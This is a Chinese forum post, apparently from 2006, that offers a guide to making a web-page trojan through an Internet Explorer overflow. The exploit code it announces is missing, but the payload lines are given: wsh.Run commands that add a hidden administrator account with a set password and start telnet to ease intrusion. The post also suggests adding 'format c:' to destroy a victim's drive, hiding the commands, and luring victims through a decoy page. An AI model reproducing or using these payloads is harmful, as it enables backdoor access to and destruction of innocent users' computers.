- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2006-12-31
- 最后登录
- 2006-12-31
|
[原创]利用IE漏洞来制作网页木马~
利用IE的漏洞可以让IE益出,下面SHOW出利用代码
为了避免不露出马脚,建议使用一个页面引出木马页面.
说明:此为HTML语句,另外打开为http://127.0.0.1/test.test的网页文件
test.test代码
说明:此代码为HTML代码,后缀名可以改成任意的,最好是小于4位....
wsh.Run("cmd.exe /k net user Virus80y 1q2w3e4r5t6y7u8i9o0p /add")
//执行益出代码后,调用CMD ,添加用户名
wsh.Run("cmd.exe /k net localgroup administrators Virus80y /add")
//把新加用户名设置为ADMIN
wsh.Run("cmd.exe /k net start telnet")
//开启TELNET,方便入侵
在cmd.exe后面可以加入DOS命令,如format c:.这样就把别人的C盘干掉了./k 为隐藏所执行的DOS命令.这样别人只看见CMD的窗口,并没有看见执行了什么命令.
我推荐加入/m /k参数.功能是执行命令的时候窗口最小化,而且隐藏所执行的命令.
DOS的功能挺多,只有想不到的,没有做不到的.
|
|